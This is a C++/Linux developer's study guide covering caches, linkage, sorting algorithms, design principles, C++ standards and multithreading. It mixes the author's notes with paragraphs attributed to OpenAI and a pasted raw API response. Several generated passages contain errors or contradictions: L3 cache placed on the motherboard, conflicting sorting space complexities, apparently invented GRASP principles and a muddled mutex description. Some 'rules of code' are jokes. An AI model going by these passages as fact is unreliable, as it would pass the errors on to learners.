Teach yourself C++ in 45 years

A Computer Science survival guide for C++/Linux developers

Dean Turpin

Fri Feb 14 23:04:37 UTC 2025

Forward

An ode to C++

Let’s start with a haiku written by a computer.

Code runs swiftly
Syntax rules guide the way
C++, a language of power

This reference is a distillation of 15+ years of online logbook notes into only the essentials that have continued to remain relevant as a senior software developer today. Just for fun – and where the topic is readily available or established – I have reached out to OpenAI to provide a paragraph or two. Consequently, the exact content and the chapter order will vary each night. Hopefully this will keep repeat visits interesting and also prevents me focusing all my attention on the first few chapters.

If time is tight, try the random daily chapter. And you can also raise a ticket on this repo.


Caches

A cache is a small amount of unusually fast memory.

A modern multi-core machine will have a multi-level cache hierarchy, where the faster and smaller caches belong to individual processors. When one processor modifies a value in its cache, other processors cannot use the old value any more; and that memory location will be invalidated in all of the caches. Furthermore, since caches operate on the granularity of cache lines and not individual bytes, the entire cache line will be invalidated in all caches.

A multiprocessor is cache consistent if all writes to the same memory location are performed in some sequential order”.

OpenAI: Processor caches refer to small, high-speed memory units located on the processor chip that store frequently accessed data and instructions. These caches improve the performance of the processor by reducing the time taken to access data from the main memory.

There are typically three levels of processor caches:

  1. Level 1 (L1) cache: This is the smallest and fastest cache, located on the processor itself. It is divided into two parts - the instruction cache, which stores frequently used instructions, and the data cache, which stores frequently used data. The size of L1 cache ranges from 8KB to 64KB.

  2. Level 2 (L2) cache: This is a larger cache, located on the processor chip or on a separate chip next to it. It is used to store data and instructions that are not found in the L1 cache. The size of L2 cache ranges from 256KB to 4MB.

  3. Level 3 (L3) cache: This is the largest and slowest cache, typically found on the motherboard. It is used to store data and instructions that are not found in the L1 and L2 caches. The size of L3 cache can range from 4MB to 64MB.

The purpose of these caches is to reduce the time taken to access data from the main memory, which is much slower than the processor. When the processor needs to access data, it first checks the L1 cache, if the data is not found there, it checks the L2 cache and then the L3 cache. If the data is not found in any of the caches, it is retrieved from the main memory.

The use of processor caches greatly improves the performance of the processor, as it reduces the number of times the processor needs to access the main memory. This is especially beneficial for tasks that involve repetitive data access, such as gaming, video editing, and web browsing.

However, since the size of these caches is limited, they can only store a certain amount of data and instructions. This means that if the data or instructions needed by the processor are not found in any of the caches, the processor will have to access the main memory, resulting in a slower performance. Additionally, if the caches are not managed efficiently, it can lead to cache conflicts where different processes are trying to access the same cache at the same time, causing delays in data retrieval.

In summary, processor caches play a crucial role in improving the performance of the processor by reducing the time taken to access data from the main memory. They are an integral part of modern processors and their effectiveness is constantly being improved with advancements in technology.

Cache consistency

A multiprocessor is cache consistent if all writes to the same memory location are performed in some sequential order.

Cache coherence

OpenAI: Cache coherence refers to the synchronization of data between different cache memory locations and the main memory in a computer system. When multiple processors or cores share access to the same data, cache coherence ensures that all copies of the data are consistent and up-to-date.

In a multi-processor system, each processor has its own cache memory which stores frequently used data from the main memory. When one processor updates a data item in its cache, other processors that have a copy of that data need to be notified and update their copies as well. This ensures that all processors have the most recent version of the data.

Cache coherence protocols are used to manage this synchronization process. These protocols define rules and mechanisms for maintaining data consistency between caches, such as invalidating outdated copies and updating them with the latest data.

Without cache coherence, there is a risk of data inconsistency and errors in the system. For example, if one processor modifies a data item and another processor reads an outdated copy of that data, it can lead to incorrect results or system crashes.

Overall, cache coherence is essential for efficient and reliable data sharing in multi-processor systems, ensuring that all processors have access to consistent and up-to-date data.

MESI cache coherence protocol

Each cache line has state, tag, data.

Snooping

See bus snooping.

Directory based coherence

Used for large CPUs. See wiki.

Write-back versus write-through

All Intel-compatible CPUs during the last one/two decades used a write-back strategy for caches (which presumes fetching a cache line first to allow partial writes). Of course that’s the theory, reality is slightly more complex than that.

Cache misses

There are three kinds of cache misses:

  1. Instruction read miss
  2. Data read miss
  3. Data write miss

OpenAI: Cache misses occur when the processor needs to access data that is not currently stored in the cache memory. This means that the data needs to be retrieved from a lower level of memory, such as the main memory or the hard drive. This process is slower compared to accessing data from the cache memory, which is why cache misses can result in slower performance.

There are two types of cache misses: compulsory and capacity.

  1. Compulsory cache misses occur when a program is first run and data is not yet stored in the cache. This is because the cache memory is empty and needs to be filled with data as it is accessed.

  2. Capacity cache misses occur when the cache memory is full and a new piece of data needs to be stored. In this case, the cache must first make room by evicting some existing data before it can store the new data. This process takes time and can result in slower performance.

Cache misses can also occur due to conflicts in the cache memory. This happens when multiple pieces of data are mapped to the same cache location, resulting in one piece of data overwriting another. This can be mitigated by using different cache mapping techniques, such as set-associative or fully associative mapping.

Overall, cache misses can significantly impact the performance of a system, especially in applications that require frequent access to large amounts of data. To reduce the number of cache misses, developers can optimize their code to make better use of the cache memory and ensure efficient data access.

Data cache

Instruction cache

Virtual functions

The way virtual functions work may cause issues with caching.

  1. Load vtable pointer: potentially data cache miss
  2. Load virtual function pointer: potentially data cache miss
  3. Then code of function is called: potential instruction cache miss

But we may be able to use CRTP to avoid the first two.

CRTP

The curiously recurring template pattern (CRTP) is an idiom in C++ in which a class X derives from a class template instantiation using X itself as template argument. More generally it is known as F-bound polymorphism, and it is a form of static polymorphism.

// Base class template using CRTP
template<typename Derived>
class Base {
public:
    void foo() {
        static_cast<Derived*>(this)->fooImpl();
    }
};

// Derived class using CRTP
class Derived : public Base<Derived> {
public:
    void fooImpl() {
        // Implementation of foo specific to Derived
        std::cout << "Hello from Derived!" << std::endl;
    }
};

Cache associativity

Cache oblivious algorithm design

Typically a cache-oblivious algorithm works by a recursive divide and conquer algorithm, where the problem is divided into smaller and smaller sub-problems. Eventually, one reaches a sub-problem size that fits into cache, regardless of the cache size.

Profiling

Data-oriented design

Design to get the most value out of every single cacheline that is read. Split apart the functions and data.

Pipeline stall contributors

Cache locality

Cache locality refers to the principle of organizing data in a way that takes advantage of the hierarchy of computer memory systems, such as the cache, main memory, and secondary storage. This means that data that is frequently accessed or used together is stored in close proximity to each other in memory, making it faster to retrieve and process.

There are two main types of cache locality:

  1. Temporal locality: This refers to the principle that data that has been recently accessed is likely to be accessed again in the near future. This is because programs often have loops or repetitive operations that require the same data to be accessed multiple times.

  2. Spatial locality: This refers to the principle that data that is stored close together in memory is likely to be accessed together. This is because programs often access data in a sequential or contiguous manner.

By optimizing for cache locality, the computer can reduce the number of times it needs to retrieve data from slower memory systems, improving overall performance and efficiency. This is especially important in modern computer architectures where the gap between processor speed and memory speed continues to widen.

Further watching

TLB: Translation lookaside buffer

The Translation Lookaside Buffer (TLB) is a hardware cache that is used in computer systems to improve the efficiency of virtual memory address translation. It is a small, high-speed cache that stores recently used virtual-to-physical address translations.

When a program references a memory location, the virtual memory address needs to be translated into a physical memory address by the operating system. This translation process involves looking up a page table or a similar data structure. Since this translation operation is performed frequently, it can introduce overhead and impact system performance.

The TLB acts as a cache for these translations, reducing the need for repeated lookups in the page table. It stores a subset of the most recently used translations, making it faster to access and retrieve the corresponding physical memory address.

TLBs can be shared between multiple cores or processors, or each core may have its own dedicated TLB.

OpenAI:

Translation lookaside buffer (TLB) is a hardware cache that stores the most recently accessed virtual-to-physical address translations. It is used in virtual memory systems to speed up the process of translating virtual addresses to physical addresses. The TLB holds a limited number of translations, typically a few hundred, and is used to reduce the time it takes to access memory. When a virtual address is accessed, the TLB is checked first to see if the translation is already present. If it is, the physical address is retrieved from the TLB and the translation process is expedited. This helps to improve the overall performance and efficiency of the system. However, if the translation is not present in the TLB, the system will have to access the page table, which can be a slower process. The TLB is constantly updated and managed by the operating system to ensure that the most frequently used translations are always available.

Memory fences

A memory fence (or barrier) is a programming language construct used to enforce an ordering constraint on memory operations issued by a thread of execution on a CPU. This typically means that operations issued prior to the fence are guaranteed to be performed before operations issued after the fence.

const int num_mailboxes = 32;
std::atomic<int> mailbox_receiver[num_mailboxes];
std::string mailbox_data[num_mailboxes];
 
// The writer threads update non-atomic shared data 
// and then update mailbox_receiver[i] as follows:
mailbox_data[i] = ...;
std::atomic_store_explicit(&mailbox_receiver[i], receiver_id, std::memory_order_release);
 
// Reader thread needs to check all mailbox[i], but only needs to sync with one.
for (int i = 0; i < num_mailboxes; ++i)
    if (std::atomic_load_explicit(&mailbox_receiver[i],
        std::memory_order_relaxed) == my_id)
    {
        // synchronize with just one writer
        std::atomic_thread_fence(std::memory_order_acquire);
        // guaranteed to observe everything done in the writer thread
        // before the atomic_store_explicit()
        do_work(mailbox_data[i]);
    }

See wiki and cppreference.

What pushes something out of the cache?

There are several factors that can push something out of the cache:

  1. Cache size limitations: Caches have a limited capacity, and if the cache becomes full, the least recently used (LRU) items are typically pushed out to make space for new entries.
  2. Cache eviction policies: Various cache eviction policies determine what gets pushed out when the cache is full. LRU (Least Recently Used) is one of the commonly used policies that evicts the oldest item that has not been accessed recently.
  3. Time-based expiration: Some caches may have a time-based expiration mechanism. If an item remains unused for a certain period of time, it can be automatically removed from the cache to make room for other data.
  4. Size-based eviction: In some cases, if the cache is designed to store items of a fixed size, new entries may replace older items when they exceed the cache’s size limit.
  5. Manual cache invalidation: Cache invalidation can be triggered manually by a programmer or system administrator. This is often done to ensure that the cache is up-to-date with the latest data, or to remove specific items from the cache.

Further reading


C++ function parameters

For simple readonly types, pass by const value.

void func(const int p) {
}

For large readonly types – i.e., larger than a pointer – pass by const reference. You should also consider if the type is trivially copyable: requiring a shallow or deep copy.

void func(const big_type& p) {
}

If the first thing you do is make a copy, pass by non-const value.

void func(int p) {
}

If you want to modify the caller’s copy, pass by non-const reference.

void func(int& p) {
}

class or struct?

The only difference between a class and a struct is the default access level: public, protected, private.

But typically a struct is used for “plain old data” or memory-mapped data where you don’t want the members to align in a predictable way (virtuals/inheritance adds the complication of a vtable pointer.)

Either way, you can test your assertions at compile time with static_assert and the type traits header.

struct A {
  // public: <-- default for structs
  int x_;
};

If the data are constrained by an invariant – i.e., not all values are valid – use a class.

class B {
  private: // <-- default for classes
  int x_; // must be between 0-1000
};

C++ linkage

Internal linkage in C++ refers to the visibility and accessibility of a variable or function within a single translation unit. A translation unit is a single source file along with all of its included header files. Variables and functions with internal linkage can only be accessed within the translation unit in which they are declared. This is achieved by using the static keyword in front of the variable or function declaration.

External linkage, on the other hand, refers to the visibility and accessibility of a variable or function across multiple translation units. Variables and functions with external linkage can be accessed from any translation unit as long as they are declared in one and defined in another. This is the default linkage for global variables and functions.

Variables and functions with external linkage can also be declared as extern in a translation unit in which they are used but not defined. This indicates to the compiler that the variable or function is defined in another translation unit and should be linked to during the compilation process. This allows for sharing of variables and functions between different parts of a program.

In summary, internal linkage restricts the visibility of a variable or function to a single translation unit, while external linkage allows for sharing of variables and functions between different translation units.

Dependencies on static variables in different translation units are, in general, a code smell and should be a reason for refactoring.

If an object or function inside such a translation unit has internal linkage, then that specific symbol is only visible to the linker within that translation unit. If an object or function has external linkage, the linker can also see it when processing other translation units. The static keyword, when used in the global namespace, forces a symbol to have internal linkage. The extern keyword results in a symbol having external linkage.

Anonymous namepsaces

Used to declare many things with internal linkage.

namespace {
  int a = 0;
  int b = 0;
  int c = 0;
}

The Software Development Life cycle (SDLC)

Waterfall versus agile

Construction of a building is often used to describe the software design process. But the analogy breaks down the building designer only has one attempt to compile the building. You can’t swap out the foundation halfway through.

Actually, in Royce’s later revisions of the model, he stated that the whole process should be done “twice if possible”.

Software validation versus verification

Validation is concerned with checking that the system will meet the customer’s actual needs. Verification will help to determine whether the software is of high quality, but it will not ensure that the system is useful.

Verification is objective (quality), validation is subjective (customer needs).

Validation is the process of checking whether the specification captures the customer’s needs, while verification is the process of checking that the software meets the specification.

See difference between verification and validation.

Waterfall sequence

RADCTDM

Advantages

Disadvantages

When should you use waterfall methodology?

Agile

Stop doing the things that nobody wants

BDD

What to call your test is easy – it’s a sentence describing the next behaviour in which you are interested. How much to test becomes moot – you can only describe so much behaviour in a single sentence. When a test fails, simply work through the process described above – either you introduced a bug, the behaviour moved, or the test is no longer relevant.

Resources

TDD

Test-driven development (TDD) is a software development process that relies on the repetition of a short development cycle: requirements are turned into specific test cases, then the software is improved to pass the new tests, only. This is opposed to software development that allows software to be added that is not proven to meet requirements.

As a [X] I want [Y] in order to [Z]

Title: Customer withdraws cash

Scenario 1: Account is in credit


Algorithms

The Jonathan Boccara CppCon 105 STL Algorithms in Less Than an Hour is well worth a watch for a quick overview.

Sorting

Quicksort is the poster boy of sorting algorithms.

{ “id”: “cmpl-B0yz954pqaeaAJCV1J0QDRo9Ou8To”, “object”: “completion”, “created”: 1739574127, “model”: “gpt-3.5-turbo-instruct:20230824-v2”, “choices”: [ { “index”: 0, “text”: ” is O(nlog(n)) in the average and best case and O(n^2) in the worst case. This is because in the average and best case, the algorithm divides the input into two sublists of roughly equal size, with each iteration reducing the size of the sublists by half. This results in a logarithmic time complexity. However, in the worst case, the pivot chosen is consistently the smallest or largest element, resulting in unbalanced partitions and a time complexity of O(n^2) as each iteration only reduces the size of the sublist by 1.”, “finish_reason”: “stop” } ], “usage”: { “prompt_tokens”: 6, “completion_tokens”: 117, “total_tokens”: 123, “prompt_tokens_details”: { “cached_tokens”: 0, “audio_tokens”: 0 }, “completion_tokens_details”: { “reasoning_tokens”: 0, “audio_tokens”: 0, “accepted_prediction_tokens”: 0, “rejected_prediction_tokens”: 0 } } }

Below is a Python implementation just for fun. But how is it implemented in C++?

def partition(arr, low, high): 
    i = ( low-1 )        
    pivot = arr[high]    
  
    for j in range(low , high): 
  
        if arr[j] < pivot: 
          
            i = i+1 
            arr[i],arr[j] = arr[j],arr[i] 
  
    arr[i+1],arr[high] = arr[high],arr[i+1] 
    return ( i+1 ) 
  
def quickSort(arr, low, high): 
    if low < high: 
  
        pi = partition(arr,low,high) 
  
        quickSort(arr, low, pi-1) 
        quickSort(arr, pi+1, high) 
  
arr = [10, 7, 8, 9, 1, 5] 
n = len(arr) 
quickSort(arr,0,n-1) 
print (\"Sorted array is:\") 
for i in range(n): 
    print (\"%d\" %arr[i]), 

std::sort uses Introsort

Introsort is a sorting algorithm that combines the best features of quicksort, heapsort, and insertion sort. It is a hybrid algorithm that uses quicksort to partition the data and then switches to heapsort when the recursion depth exceeds a certain level. If the data set is small enough, it switches to insertion sort for faster sorting. This algorithm is designed to handle the worst-case scenario of quicksort, which is when the data is already sorted or nearly sorted.

The algorithm starts by choosing a pivot element, typically the first or last element in the list. Then, it partitions the data into two sublists, one with elements less than the pivot and one with elements greater than the pivot. This process is repeated recursively on each sublist until the sublists are small enough to be sorted using insertion sort.

However, to prevent the worst-case scenario of quicksort, the algorithm also checks the recursion depth and switches to heapsort when it exceeds a certain level. Heapsort guarantees a worst-case time complexity of O(n log n), which is better than quicksort’s worst-case time complexity of O(n^2).

Introsort has a time complexity of O(n log n) in the average and best cases, and O(n log n) in the worst case. It also has a space complexity of O(log n). This makes it a very efficient sorting algorithm for large data sets, especially when the data is mostly sorted or nearly sorted.

In summary, introsort is a hybrid sorting algorithm that combines the strengths of quicksort, heapsort, and insertion sort to efficiently sort large data sets with a guarantee of O(n log n) time complexity in all cases.

Introsort is in place but not stable: i.e., equivalent elements are not guaranteed to remain in the same order. However, the Standard Library offers stable_ versions of various sorting algorithms.

If additional memory is available, stable_sort remains O(n ∗ logn). However, if it fails to allocate, it will degrade to an O(n ∗ logn ∗ logn) algorithm.

https://leanpub.com/cpp-algorithms-guide

Small array threshold

The threshold for switching to insertion sort varies for each compiler.

std::list

std::sort requires random access to the elements, so std::list has its own sort method, but it still (approximately) conforms to O(n log n). It can be implemented with merge sort as moving elements is cheap with a linked list.

Other sorting algorithms

Considerations for choosing an algorithm: size of input, Type of input: e.g., partially sorted, random.

Sorting algorithms are used to organize a list of elements in a specific order. The performance of a sorting algorithm is usually measured by its time complexity and space complexity.

  1. Bubble Sort: Time complexity: O(n^2) Space complexity: O(1)

Bubble sort is a simple and intuitive sorting algorithm that works by repeatedly swapping adjacent elements if they are in the wrong order. It has a time complexity of O(n^2), which means that it takes quadratic time to sort a list of n elements. This means that as the size of the input increases, the time taken to sort the list increases significantly. However, it has a space complexity of O(1), which means that it does not use any additional memory other than the given list.

  1. Selection Sort: Time complexity: O(n^2) Space complexity: O(1)

Selection sort works by repeatedly finding the minimum element from the unsorted part of the list and placing it at the beginning. It has a time complexity of O(n^2), which is the same as bubble sort. However, it has a slightly better space complexity of O(1) as it does not require any additional memory other than the given list.

  1. Insertion Sort: Time complexity: O(n^2) Space complexity: O(1)

Insertion sort is similar to selection sort, but instead of finding the minimum element and placing it at the beginning, it finds the correct position for each element in the sorted part of the list and inserts it there. It also has a time complexity of O(n^2) and a space complexity of O(1).

  1. Merge Sort: Time complexity: O(nlogn) Space complexity: O(n)

Merge sort is a divide and conquer algorithm that splits the list into smaller sublists, sorts them, and then merges them back together. It has a time complexity of O(nlogn), which is significantly better than the previous sorting algorithms. However, it has a space complexity of O(n), as it requires additional memory to store the sublists during the sorting process.

  1. Quick Sort: Time complexity: O(nlogn) Space complexity: O(logn)

Quick sort is also a divide and conquer algorithm that works by selecting a pivot element and partitioning the list into two sublists, one with elements smaller than the pivot and one with elements larger than the pivot. It then recursively sorts the sublists. It has a time complexity of O(nlogn), which is the same as merge sort, but it has a space complexity of O(logn) as it uses a stack to keep track of the recursive calls.

  1. Heap Sort: Time complexity: O(nlogn) Space complexity: O(1)

Heap sort uses a heap data structure to sort the list. It first builds a heap from the list and then repeatedly removes the root element and places it at the end of the sorted part of the list. It has a time complexity of O(nlogn), which is the same as merge and quick sort, but it has a space complexity of O(1) as it sorts the list in place without requiring any additional memory.

In summary, the time complexity of sorting algorithms can range from O(n) to O(n^2), with merge and quick sort having the best time complexity of O(nlogn). However, this comes at the cost of a higher space complexity. In terms of space complexity, bubble, selection, and insertion sort have the best complexity of O(1), while merge and heap sort have a space complexity of O(n) and quick sort has a space complexity of O(logn).

All of these are Θ(n log n) in all cases apart from Timsort has a Ω(n) and Quicksort has a terrible O(n^2) (if we happen to always pick the worst pivot). Quicksort is a good all rounder with O(n log n) average case. But it does have a O(n^2) worst case. It is said that this can be avoided by picking the pivot carefully but an example could be constructed where the chosen pivot is always the worst case.

References

SOLID

  1. Single Responsibility Principle (SRP): A class should have only one responsibility or one reason to change.
  2. Open/Closed Principle (OCP): Software entities (classes, modules, functions, etc.) should be open for extension, but closed for modification.
  3. Liskov Substitution Principle (LSP): Subtypes should be substitutable for their base types without altering the correctness of the program.
  4. Interface Segregation Principle (ISP): Clients should not be forced to depend on interfaces they do not use, and classes should not implement unnecessary methods.
  5. Dependency Inversion Principle (DIP): High-level modules should not depend on low-level modules. Both should depend on abstractions. Abstractions should not depend on details; details should depend on abstractions.

GRASP

Less common but another set of principles to consider.

  1. Information Expert: Assign responsibility to the class or object with the most information needed to fulfill it.

  2. Creator: Assign the responsibility to create objects to the class that has the necessary information about the object’s creation.

  3. High Cohesion: Assign responsibility to a class or object that has a tightly focused and well-defined purpose.

  4. Low Coupling: Reduce inter-dependencies between classes by assigning responsibilities to classes with minimal connections to other classes.

  5. Controller: Assign the responsibility of handling input and coordinating actions to a separate controller class.

  6. Polymorphism: Use inheritance and interface implementation to enable polymorphic behavior, allowing different objects to respond differently to the same message.

  7. Indirection: Assign responsibility for handling a request to an intermediate object that can delegate the request to another object.

  8. Pure Fabrication: Create a class solely for the purpose of supporting other classes and objects.

  9. Protected Variations: Encapsulate the parts of the system that are likely to change, in order to protect other parts from being affected.

  10. Creator-Information Expert: Assign the responsibility of creating objects to the class that has the most information about the object being created.

  11. Low Coupling-Controller: Assign the responsibility of coordinating actions to a separate controller class with minimal dependencies.

  12. Polymorphism-Controller: Use polymorphism to enable different controllers to handle the same input in different ways.

  13. Pure Fabrication-Controller: Create a controller class solely for the purpose of handling input and coordinating actions.

  14. Controller-Protected Variations: Use a controller class to encapsulate variations in handling input and coordinating actions.

  15. Polymorphism-Pure Fabrication: Use polymorphism to enable pure fabrication classes to support different types of objects.


C++ standards

The big things for me are ranges and views, so effortlessly express and manipulate ranges of data with zero iterators; they read naturally and are also lazy-evaluated (and gcc 14 brings ranges::to<> to the party). Concepts I’ve used a little, but mostly to narrow the allowed types of an auto parameter: e.g., std::floating_point auto.

I’ve attempted to deep dive into templates a few times and it’s really quite an unpleasant language! However, whilst not a recent addition, constexpr is becoming increasingly supported; it gives you the readability of “normal” code with the potential performance benefits of compile-time. And it also finds UB! However, you quickly hit the issue where something isn’t constexpr so you have to either implement it yourself or not bother.

Coroutines are quite high-profile but I haven’t got into them yet. Finally, the multidimensional array operator seemed like a game changer but I’ve only used it once.

You’ll have to reach into gcc 14 but std::print is very welcome; as are modules (which might actually be available in 13.2 with -fmodules-fs flag) but poorly supported and not quite what I’d like yet.

Notable mentions from C++17 are structured bindings and execution policy.

C++26

C++23

See the presentation by Marc Gregoire (CppCon 2022).

You’ve gotta track gcc head to avoid disappointment.

Ranges and views (part two)

A lot of effort has gone into ranges and views in C++23.

std::ranges

std::views

C++20

C++17

Also see cppreference.

C++14

C++14 is an extension and improvement of C++11.

C++11


The rules of code

  1. A single file should contain fewer than 20000 lines of code
  2. It would be nice if a single routine could fit into 1000 lines of code (makes testing easier)
  3. Ensure comments are ignored by prefixing “todo”
  4. Use consistent formatting: even better, don’t bother and let clang-format do it
  5. Make things constant: it’s much easier to reason about code when the data are immutable
  6. Unit testing is awesome and will almost certainly catch on

Unit testing

A test is not a unit test if it:

See the complete article.


Binary structure

See Linux Debuginfo Formats - DWARF, ELF, dwo, dwp - What are They All? - Greg Law - CppCon 2022.

Section Description
stack / Local variables
heap /\ Dynamic memory
.rodata Read-only data
.bss Uninitialised data
.data Initialised data
.text Code
  1. Header: This segment contains information about the file, such as the file size, entry point, and architecture.

  2. Text/code: This segment contains the actual machine code that is executed by the processor. It includes instructions, function definitions, and data literals.

  3. Data: This segment contains initialized data such as global and static variables.

  4. BSS (Block Started by Symbol): This segment contains uninitialized data, usually declared as global or static variables.

  5. Stack: This segment contains the program’s execution stack, which is used for local variables, function parameters, and return addresses.

  6. Heap: This segment contains dynamically allocated memory, typically managed by the program’s memory management functions.

  7. Dynamic Linking: This segment contains information required for the program to link and load dynamic libraries at runtime.

  8. Relocation: This segment contains information about the addresses of symbols and how to relocate them when the program is loaded into memory.

  9. Debug: This segment contains debugging information, such as line numbers, symbols, and source code information, used for debugging and error handling.

  10. Resources: This segment contains additional resources such as icons, images, and strings used by the program.

  11. Export: This segment contains information about symbols that can be accessed by other programs.

  12. Import: This segment contains information about symbols that are required by the program and must be resolved at runtime by the operating system.


The magnitude of it all

In 2014 Randall Munroe estimated that Google stores 10 exabytes of data across all of its operations. However, as a C++ developer, you will only come across at most petabytes of storage; and if CPUs are topping out at gigahertz, then you won’t see anything much faster than a nanosecond.

                        1 000  kilo | milli .001
                    1 000 000  mega | micro .000 001
                1 000 000 000  giga | nano  .000 000 001
            1 000 000 000 000  tera | pico  .000 000 000 001
        1 000 000 000 000 000  peta | femto .000 000 000 000 001
    1 000 000 000 000 000 000   exa | atto  .000 000 000 000 000 001
1 000 000 000 000 000 000 000 zetta | zepto .000 000 000 000 000 000 001

See list of SI prefixes.

You may be tempted to use binary prefixes to be more precise – kibi, mebi, gibi, etc – but most people won’t know what you’re talking about. Also, manufacturers tend to use 10003 rather than 220 because it makes their performance look better.

Important speeds you should be aware of

See why is everyone in such a rush?

1/1000000000 second == 1 nanosecond 

Approximate durations of typical operations (rounded to help remember.)

Action Duration (nanoseconds)
L1 cache read, variable increment <1
Branch misprediction (how do you measure this?) 5
L2 cache read, std::atomic 10
std::mutex/scoped_lock 20
Fetch from main memory 100
Semaphore acquire 200
Send 2KiB over 1Gbps network 20,000
Create a std::thread 20,000
Send packet from US to Europe and back 200,000,000

Hash functions

A hash function is a mathematical algorithm that takes in data of any size and produces a fixed-size output called a hash value or hash code. This output is typically a unique representation of the input data and is used to identify and compare data quickly. Hash functions are commonly used in cryptography, data storage, and data retrieval systems.

Properties of a hashing algorithm

String hashing


Resources


Multithreading

Multithreaded concepts are important: e.g., atomics, locks, issues with different designs, how to make things thread safe.

Why use multithreading? For performance and/or separation of concerns.

Reentrancy

A routine can be described as reentrant if it can be interrupted and not leave the operation partially complete: the invariants remain true.

Invariants

A good way to reason about your code is to consider the invariants that must be true at any given point in time. For a linked list, node A’s next pointer must point to node B and node B’s previous pointer must point to node A. However, if you are deleting an element from a linked list there will be a period where this invariant does not hold, and you must acquire mutual access to both nodes whilst the list is being updated; otherwise another thread may see the list in an invalid state.

OpenAI: Invariants refer to specific conditions or properties that remain constant or unchanged throughout a particular process, system, or situation. They are important concepts in mathematics, computer science, and engineering, as well as in other fields such as physics and economics.

Invariants are often used to describe the behavior of a system or process, and they can help identify and understand patterns and relationships between different variables. They can also be used to prove the correctness of algorithms and programs.

There are different types of invariants, including:

  1. Loop invariants: These are conditions that remain true before, during, and after each iteration of a loop in a computer program.

  2. Data invariants: These are properties or constraints that remain true for a particular data structure or object throughout its lifetime.

  3. Physical invariants: These are properties or quantities that remain constant in a physical system, such as energy or momentum.

  4. Logical invariants: These are constraints or relationships that remain unchanged in a logical system, such as a set of axioms or rules of inference.

Invariants are important because they can help identify errors or bugs in a system. If an invariant is violated, it means that something in the system is not working as expected and needs to be fixed. They also provide a way to verify the correctness of a system, as any changes that violate the invariants can be identified and corrected.

Overall, invariants play a crucial role in understanding and analyzing systems and processes, and they are essential tools for ensuring their correctness and stability.

Idempotence

A function is idempotent if it can be applied multiple times without changing the outcome. E.g., repeatedly pressing the “on” switch of an “on/off” pair: it’s still on. See Wikipedia.

Race conditions

tl;dr “Race condition: an unfortunate order of execution causes undesirable behaviour.”

OpenAI: A race condition in computer science refers to a situation where the outcome or behavior of a system depends on the timing or sequence of events, and different outcomes or behaviors can occur depending on which event occurs first. This can lead to unexpected or incorrect behavior of the system.

One common example of a race condition is when multiple processes or threads access and modify a shared resource without proper synchronization. If the timing of these accesses is not controlled, it can lead to conflicts and inconsistencies in the shared resource, resulting in incorrect behavior of the system.

Another example is in concurrent programming, where multiple processes or threads are running simultaneously and accessing shared data. If these processes are not properly synchronized, they can interfere with each other’s operations and cause unexpected results.

Race conditions can also occur in distributed systems, where multiple nodes are communicating and sharing data. If the communication is not synchronized, it can lead to conflicts and inconsistencies in the shared data, resulting in incorrect behavior of the system.

In general, race conditions can occur in any situation where there is shared access to a resource or when multiple processes are interacting and their behavior is dependent on the timing of events. They can be difficult to identify and debug, making them a common source of errors and bugs in computer systems. Proper synchronization and careful design can help prevent race conditions and ensure the correct behavior of a system.

Considerations

Deadlocks and livelocks

See the Dining philosophers problem.

A real world example: Ken and Barbie walk over to the barbecue. Ken grabs the last remaining sausage and attempts to acquire the hot sauce; meanwhile, Barbie has already secured the hot sauce and is waiting for the sausage to become available. A sausage cannot be enjoyed without hot sauce, so neither can proceed and remain stuck in a deadlock indefinitely.

A livelock occurs when measures are taken to avoid a deadlock, but the measures themselves do not resolve the conflict. For example, Ken and Barbie both agree to put down their respective items and try again; however, they both pick up the same item agains and the deadlock continues.

OpenAI: Both deadlocks and livelocks are types of concurrency issues that can occur in multi-threaded programs. They both involve situations where threads are unable to make progress, but there are some key differences between them.

Deadlocks occur when two or more threads are blocked and unable to continue because they are waiting for each other to release a resource that they both need. This creates a circular dependency and the threads will remain blocked indefinitely unless the issue is resolved externally. In other words, the threads are "deadlocked" with each other.

On the other hand, livelocks occur when two or more threads are constantly changing their states in response to each other, but are unable to make any real progress. This can happen when the threads are trying to be polite and avoid conflicts, but end up getting stuck in a loop of constantly trying to give way to each other. In a livelock, the threads are not blocked, but they are not making any progress either.

In summary, the key differences between deadlocks and livelocks are:

  1. Cause: Deadlocks are caused by threads waiting for each other’s resources, while livelocks are caused by threads trying to be polite and avoid conflicts.

  2. State: In a deadlock, threads are blocked and unable to make progress, while in a livelock, threads are constantly changing their states but not making any progress.

  3. Resolution: Deadlocks can only be resolved externally by breaking the circular dependency, while livelocks can be resolved by implementing a different strategy for thread interaction.

Avoiding deadlocks

Run your code on different numbers of CPUs; it’s interesting how the bottlenecks move around depending on the available resources.

OpenAI: 1. Use a lock ordering hierarchy: To avoid deadlocks, establish a lock ordering hierarchy where locks are acquired in a specific order. This will prevent two threads from trying to acquire the same set of locks in a different order and potentially causing a deadlock.

  1. Limit lock acquisition time: Set a timeout for how long a thread can hold a lock. If the thread is unable to complete its task within the allotted time, it will release the lock and allow other threads to acquire it.

  2. Use thread-safe data structures: Thread-safe data structures have built-in mechanisms to prevent multiple threads from accessing them at the same time. This can help avoid deadlocks caused by multiple threads trying to access the same data.

  3. Avoid nested locks: Nested locks occur when a thread tries to acquire a lock while holding another lock. This can lead to deadlocks if the second lock is already held by another thread. To avoid this, try to limit the use of nested locks or use a lock-free algorithm.

  4. Use a deadlock detection algorithm: Some programming languages and operating systems have built-in deadlock detection algorithms that can identify and resolve deadlocks. Make use of these tools to help prevent and detect deadlocks in your code.

  5. Avoid long-running transactions: Long-running transactions that hold locks for extended periods of time can increase the chances of deadlocks occurring. Consider breaking up long transactions into smaller, more manageable chunks to reduce the likelihood of deadlocks.

  6. Test and debug your code: It’s important to thoroughly test and debug your code to identify potential deadlocks. Use debugging tools and techniques to identify and resolve any potential issues before they become a problem in a production environment.

See also

Additionally

Synchronising threads

OpenAI: Mutex and semaphore are both synchronization mechanisms used in multi-threaded programming to control access to shared resources. They both ensure that only one thread can access a shared resource at a time, preventing race conditions and data corruption.

  1. Purpose: Mutex (Mutual Exclusion) is used to protect a shared resource from being accessed simultaneously by multiple threads. It allows only one thread to acquire the lock and access the resource, while other threads wait for the lock to be released.

Semaphore is used to control the number of threads that can access a shared resource at a given time. It maintains a counter and allows a fixed number of threads to access the resource simultaneously. Once the maximum limit is reached, other threads are put on hold until a thread releases the semaphore.

  1. Implementation: Mutex is typically implemented using a binary semaphore, where the lock is acquired by setting the semaphore count to 1 and released by setting it back to 0. It uses a simple locking mechanism and has a lower overhead compared to a semaphore.

